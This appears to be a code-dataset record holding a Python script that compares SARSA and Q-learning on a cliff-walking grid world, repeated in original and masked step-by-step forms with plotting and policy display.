def reward(s_1, s_2):
if s_1.is_goal or s_1.is_cliff:
return 0
elif s_2.is_goal:
return 10
elif s_2.is_cliff:
return -100
else:
return -1
<|reserved_special_token_0|>
def transition(stsp, s, di, dj):
if s.is_cliff or s.is_goal:
return s
elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):
return s
else:
return stsp[s.i + di][s.j + dj]
gamma = 1
learning_rate = 0.01
def action_to_diff_vector(action):
if action == 0:
return -1, 0
elif action == 1:
return 0, 1
elif action == 2:
return 1, 0
elif action == 3:
return 0, -1
def action_to_verbose(action):
if action == 0:
return 'NORTH'
elif action == 1:
return 'EAST'
elif action == 2:
return 'SOUTH'
elif action == 3:
return 'WEST'
def sarsa(state, next_state, action, next_state_action):
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma * next_state
.q_values[next_state_action] - state.q_values[action])
def q_learning(state, next_state, action, next_state_action):
next_state_q_value = next_state.get_max_q_value()
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma *
next_state_q_value - state.q_values[action])
N_STEPS = 10000
METHOD = 'BOTH'
EPSILONS = [0.05, 0.1, 0.25]
def run_code(use_q_learning=False, _epsilon=0.01):
states = initialize_states()
decay = 1
min_epsilon = 1e-05
epsilon = _epsilon
episode_rewards = []
mistakes_array = []
for i in range(N_STEPS):
current_state = states[N_ROWS - 1][0]
epsilon = max(min_epsilon, epsilon * decay)
episode_reward = 0
while not current_state.is_terminal():
if random() < epsilon:
next_action = randint(0, 3)
else:
next_action = current_state.get_max_q_index()
di, dj = action_to_diff_vector(next_action)
next_state = transition(states, current_state, di, dj)
if random() < epsilon:
next_state_action = randint(0, 3)
else:
next_state_action = next_state.get_max_q_index()
if use_q_learning:
reward, current_state.q_values[next_action] = q_learning(
current_state, next_state, next_action, next_state_action)
else:
reward, current_state.q_values[next_action] = sarsa(
current_state, next_state, next_action, next_state_action)
episode_reward += reward
current_state = next_state
if len(episode_rewards):
episode_rewards.append(episode_rewards[-1] + episode_reward)
else:
episode_rewards.append(episode_reward)
"""
if (i % 100 == 0):
print(i)
"""
mistakes_array.append(check_accuracy(states))
return np.array(mistakes_array), states, episode_rewards
def check_accuracy(states):
correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1,
0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,
3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,
0, 0, 0, 0, 0, 0]])
mistakes_delta = 0
for i in range(N_ROWS):
for j in range(N_COLUMNS):
mistakes_delta += abs(correct_result[i][j] - max(states[i][j].
q_values))
return mistakes_delta
def plot_errors(mistakes_sarsa, mistakes_q_learning):
plt.gca().invert_yaxis()
legend = []
for mistake_sarsa in mistakes_sarsa:
plt.plot(mistake_sarsa[1])
legend.append('SARSA $\\epsilon={}$'.format(mistake_sarsa[0]))
for mistake_q_learning in mistakes_q_learning:
plt.plot(mistake_q_learning[1])
legend.append('Q-learning $\\epsilon={}$'.format(mistake_q_learning[0])
)
plt.grid(which='y')
plt.legend(legend)
plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))
def plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):
final_grid = np.array([[max(states[i][j].q_values) for j in range(
N_COLUMNS)] for i in range(N_ROWS)])
if PLOTS > 2:
ax = ax[PLOTS % 3, 1]
else:
ax = ax[PLOTS, 0]
ax.imshow(final_grid, aspect='auto', cmap='coolwarm')
ax.set_xticks(np.arange(N_COLUMNS))
ax.set_yticks(np.arange(N_ROWS))
ax.set_xticklabels([i for i in range(N_COLUMNS)])
ax.set_yticklabels([i for i in range(N_ROWS)])
plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=
'anchor')
for i in range(N_ROWS):
for j in range(N_COLUMNS):
text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)
), ha='center', va='center', color='w')
fig.tight_layout()
ax.set_title('{}; $\\epsilon={}$'.format(method, epsilon))
for i in range(N_ROWS):
str_ = ''
for j in range(N_COLUMNS):
str_ += str(int(final_grid[i][j])) + ', '
PLOTS += 1
def display_optimal_policy(states, method, epsilon):
print('{}; ε = {}'.format(method, epsilon))
print('-' * 60)
for i in range(len(states)):
line_str = ''
for j in range(len(states[0])):
if j == 0:
print('|', end='')
if states[i][j].is_goal:
print(Back.GREEN + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
elif states[i][j].is_cliff:
print(Back.RED + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
else:
print(' {} | '.format(q_to_arrow(states[i][j].
get_max_q_index())), end='')
print(line_str)
print('-' * 60)
if METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:
print('invalidt method. must be Q_LEARNING or SARSA or both')
import sys
sys.exit()
mistakes_q_learning = []
mistakes_sarsa = []
PLOTS = 0
fig, axes = plt.subplots(3, 2)
rewards = []
for epsilon in EPSILONS:
if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':
_mistakes_q_learning, end_states_q_learning, episode_rewards = (
run_code(use_q_learning=True, _epsilon=epsilon))
plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING',
epsilon, PLOTS, fig, axes)
display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)
mistakes_q_learning.append((epsilon, _mistakes_q_learning))
rewards.append(('Q_LEARNING', epsilon, episode_rewards))
PLOTS += 1
for epsilon in EPSILONS:
if METHOD == 'SARSA' or METHOD == 'BOTH':
_mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(
use_q_learning=False, _epsilon=epsilon)
plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS,
fig, axes)
display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)
mistakes_sarsa.append((epsilon, _mistakes_sarsa))
rewards.append(('SARSA', epsilon, episode_rewards))
PLOTS += 1
plt.savefig('all_runs.png')
plt.show()
for reward in rewards:
plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))
plt.xlabel('Episodes')
plt.ylabel('Sum of rewards during episode')
plt.legend()
plt.show()
plt.savefig('episode_rewards.png')
plot_errors(mistakes_sarsa, mistakes_q_learning)
<|reserved_special_token_1|>
from math import *
from numpy import *
from random import *
import numpy as np
import matplotlib.pyplot as plt
from colorama import Fore, Back, Style
from gridworld import q_to_arrow
N_ROWS = 6
N_COLUMNS = 10
class State(object):
def __init__(self, i, j, is_cliff=False, is_goal=False):
self.i = i
self.j = j
self.is_cliff = is_cliff
self.is_goal = is_goal
# north, east, south, west
self.q_values = np.array([0.0, 0.0, 0.0, 0.0])
def __str__(self):
return '({}, {})'.format(self.i, self.j)
def is_terminal(self):
return self.is_goal or self.is_cliff
def get_max_q_index(self):
best_q_values = np.argwhere(self.q_values == np.max(self.q_values))
if len(best_q_values) > 1:
return best_q_values[randint(0, len(best_q_values) - 1)][0]
else:
_max_q = np.argmax(self.q_values)
return _max_q
def get_max_q_value(self):
return np.max(self.q_values)
def initialize_states():
# This is the set of states, all initialised with default values
states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]
# make the cliff
for j in range(1, N_COLUMNS - 1):
states[-1][j].is_cliff = True
states[-1][-1].is_goal = True
return states
# The reward function defines what reward I get for transitioning between the first and second state
def reward(s_1, s_2):
if (s_1.is_goal or s_1.is_cliff):
return 0
elif (s_2.is_goal):
return 10
elif (s_2.is_cliff):
return -100
else:
return -1
""" the transition function takes state and action and results in a new state, depending on their attributes. The method takes the whole state-space as an argument (since the transition depends on the attributes of the states in the state-space), which could for example be the "states" matrix from above, the current state s from the state-space (with its attributes), and the current action, which takes the form of a "difference vector. For example, dx = 0, dy = 1 means: Move to the south. dx = -1, dy = 0 means: Move to the left"""
def transition(stsp, s, di, dj):
if (s.is_cliff or s.is_goal):
return s
elif (s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS)):
return s
else:
return stsp[s.i + di][s.j + dj]
gamma = 1
learning_rate = 0.01
def action_to_diff_vector(action):
if action == 0: # NORTH
return -1, 0
elif action == 1: # EAST
return 0, 1
elif action == 2: # SOUTH
return 1, 0
elif action == 3: # WEST
return 0, -1
def action_to_verbose(action):
if action == 0:
return 'NORTH'
elif action == 1:
return 'EAST'
elif action == 2:
return 'SOUTH'
elif action == 3:
return 'WEST'
def sarsa(state, next_state, action, next_state_action):
return reward(state, next_state), state.q_values[action] +\
learning_rate * (reward(state, next_state) + gamma * next_state.q_values[next_state_action] - state.q_values[action])
def q_learning(state, next_state, action, next_state_action):
next_state_q_value = next_state.get_max_q_value()
return reward(state, next_state), state.q_values[action] +\
learning_rate * (reward(state, next_state) + gamma * next_state_q_value - state.q_values[action])
N_STEPS = 10000
METHOD = 'BOTH'
EPSILONS = [0.05, 0.1, 0.25]
def run_code(use_q_learning=False, _epsilon=0.01):
states = initialize_states()
decay = 1
min_epsilon = 0.00001
epsilon = _epsilon
episode_rewards = []
mistakes_array = [] # array which tracks error from convergence on each step
for i in range(N_STEPS):
# select a random starting state
current_state = states[N_ROWS-1][0]
# iterate until reaching a terminal state
epsilon = max(min_epsilon, epsilon * decay)
episode_reward = 0
while not current_state.is_terminal():
if random() < epsilon:
next_action = randint(0, 3)
else:
next_action = current_state.get_max_q_index()
di, dj = action_to_diff_vector(next_action)
next_state = transition(states, current_state, di, dj)
if random() < epsilon:
next_state_action = randint(0, 3)
else:
next_state_action = next_state.get_max_q_index()
if use_q_learning:
reward, current_state.q_values[next_action] = q_learning(current_state, next_state, next_action, next_state_action)
else:
reward, current_state.q_values[next_action] = sarsa(current_state, next_state, next_action, next_state_action)
# print(current_state, next_state, action_to_verbose(next_action), di, dj)
episode_reward += reward
current_state = next_state
if len(episode_rewards):
episode_rewards.append(episode_rewards[-1] + episode_reward)
else:
episode_rewards.append(episode_reward)
'''
if (i % 100 == 0):
print(i)
'''
mistakes_array.append(check_accuracy(states))
return np.array(mistakes_array), states, episode_rewards
def check_accuracy(states):
correct_result = np.array([
[-3, -2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 ],
[-2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 ],
[-1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 ],
[0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 ],
[1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 ],
[0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 ],
])
mistakes_delta = 0
for i in range(N_ROWS):
for j in range(N_COLUMNS):
mistakes_delta += abs(correct_result[i][j] - max(states[i][j].q_values))
return mistakes_delta
def plot_errors(mistakes_sarsa, mistakes_q_learning):
plt.gca().invert_yaxis()
legend = []
for mistake_sarsa in mistakes_sarsa:
plt.plot(mistake_sarsa[1])
legend.append(r'SARSA $\epsilon={}$'.format(mistake_sarsa[0]))
for mistake_q_learning in mistakes_q_learning:
plt.plot(mistake_q_learning[1])
legend.append(r'Q-learning $\epsilon={}$'.format(mistake_q_learning[0]))
plt.grid(which='y')
plt.legend(legend)
plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))
# plt.show()
def plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):
final_grid = np.array([[max(states[i][j].q_values) for j in range(N_COLUMNS)] for i in range(N_ROWS)])
if PLOTS > 2:
ax = ax[PLOTS % 3, 1]
else:
ax = ax[PLOTS, 0]
ax.imshow(final_grid, aspect='auto', cmap='coolwarm')
# fig, ax = plt.subplots()
ax.set_xticks(np.arange(N_COLUMNS))
ax.set_yticks(np.arange(N_ROWS))
ax.set_xticklabels([i for i in range(N_COLUMNS)])
ax.set_yticklabels([i for i in range(N_ROWS)])
plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor")
# Loop over data dimensions and create text annotations.
for i in range(N_ROWS):
for j in range(N_COLUMNS):
text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)),
ha="center", va="center", color="w")
fig.tight_layout()
ax.set_title("{}; $\epsilon={}$".format(method, epsilon))
for i in range(N_ROWS):
str_ = ""
for j in range(N_COLUMNS):
str_ += str(int(final_grid[i][j])) + ", "
PLOTS += 1
# plt.savefig('CLIFF_WALKING: {}-{}-{}.png'.format(N_STEPS, epsilon, method))
# plt.show()
def display_optimal_policy(states, method, epsilon):
print("{}; ε = {}".format(method, epsilon))
print('-' * 60)
for i in range(len(states)):
line_str = ''
for j in range(len(states[0])):
if j == 0:
print('|', end='')
if states[i][j].is_goal:
print(Back.GREEN + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
elif states[i][j].is_cliff:
print(Back.RED + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
else:
print(' {} | '.format(q_to_arrow(states[i][j].get_max_q_index())), end='')
print(line_str)
print('-' * 60)
if METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:
print('invalidt method. must be Q_LEARNING or SARSA or both')
import sys; sys.exit()
mistakes_q_learning = []
mistakes_sarsa = []
PLOTS = 0
fig, axes = plt.subplots(3, 2)
rewards = []
for epsilon in EPSILONS:
if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':
_mistakes_q_learning, end_states_q_learning, episode_rewards = run_code(use_q_learning=True, _epsilon=epsilon)
plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING', epsilon, PLOTS, fig, axes)
display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)
mistakes_q_learning.append((epsilon, _mistakes_q_learning))
rewards.append(('Q_LEARNING', epsilon, episode_rewards))
PLOTS += 1
for epsilon in EPSILONS:
if METHOD == 'SARSA' or METHOD == 'BOTH':
_mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(use_q_learning=False, _epsilon=epsilon)
plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS, fig, axes)
display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)
mistakes_sarsa.append((epsilon, _mistakes_sarsa))
rewards.append(('SARSA', epsilon, episode_rewards))
PLOTS += 1
plt.savefig('all_runs.png')
plt.show()
# for i, j in [(0, 3), (1, 4), (2, 5)]:
for reward in rewards:
# plt.plot(rewards[i][2], 'o', label='{} ε = {} '.format(rewards[i][0], rewards[i][1]))
# plt.plot(rewards[j][2], 'o', label='{} ε = {} '.format(rewards[j][0], rewards[j][1]))
plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))
plt.xlabel('Episodes')
plt.ylabel('Sum of rewards during episode')
plt.legend()
plt.show()
plt.savefig('episode_rewards.png')
plot_errors(mistakes_sarsa, mistakes_q_learning)
|
flexible
|
{
"blob_id": "cb2e800cc2802031847b170a462778e5c0b3c6f9",
"index": 40,
"step-1": "<mask token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n states[-1][-1].is_goal = True\n return states\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<mask token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<mask token>\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\n<mask token>\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n states[-1][-1].is_goal = True\n return states\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<mask token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<mask token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<mask token>\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\n<mask token>\n\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append('SARSA $\\\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append('Q-learning $\\\\epsilon={}$'.format(mistake_q_learning[0])\n )\n plt.grid(which='y')\n plt.legend(legend)\n plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n\n\n<mask token>\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\n<mask token>\n",
"step-3": "<mask token>\nN_ROWS = 6\nN_COLUMNS = 10\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n states[-1][-1].is_goal = True\n return states\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<mask token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\ngamma = 1\nlearning_rate = 0.01\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\nN_STEPS = 10000\nMETHOD = 'BOTH'\nEPSILONS = [0.05, 0.1, 0.25]\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append('SARSA $\\\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append('Q-learning $\\\\epsilon={}$'.format(mistake_q_learning[0])\n )\n plt.grid(which='y')\n plt.legend(legend)\n plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n\n\ndef plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):\n final_grid = np.array([[max(states[i][j].q_values) for j in range(\n N_COLUMNS)] for i in range(N_ROWS)])\n if PLOTS > 2:\n ax = ax[PLOTS % 3, 1]\n else:\n ax = ax[PLOTS, 0]\n ax.imshow(final_grid, aspect='auto', cmap='coolwarm')\n ax.set_xticks(np.arange(N_COLUMNS))\n ax.set_yticks(np.arange(N_ROWS))\n ax.set_xticklabels([i for i in range(N_COLUMNS)])\n ax.set_yticklabels([i for i in range(N_ROWS)])\n plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=\n 'anchor')\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)\n ), ha='center', va='center', color='w')\n fig.tight_layout()\n ax.set_title('{}; $\\\\epsilon={}$'.format(method, epsilon))\n for i in range(N_ROWS):\n str_ = ''\n for j in range(N_COLUMNS):\n str_ += str(int(final_grid[i][j])) + ', '\n PLOTS += 1\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\nif METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:\n print('invalidt method. must be Q_LEARNING or SARSA or both')\n import sys\n sys.exit()\nmistakes_q_learning = []\nmistakes_sarsa = []\nPLOTS = 0\nfig, axes = plt.subplots(3, 2)\nrewards = []\nfor epsilon in EPSILONS:\n if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':\n _mistakes_q_learning, end_states_q_learning, episode_rewards = (\n run_code(use_q_learning=True, _epsilon=epsilon))\n plot_best_q_values_states(end_states_q_learning, 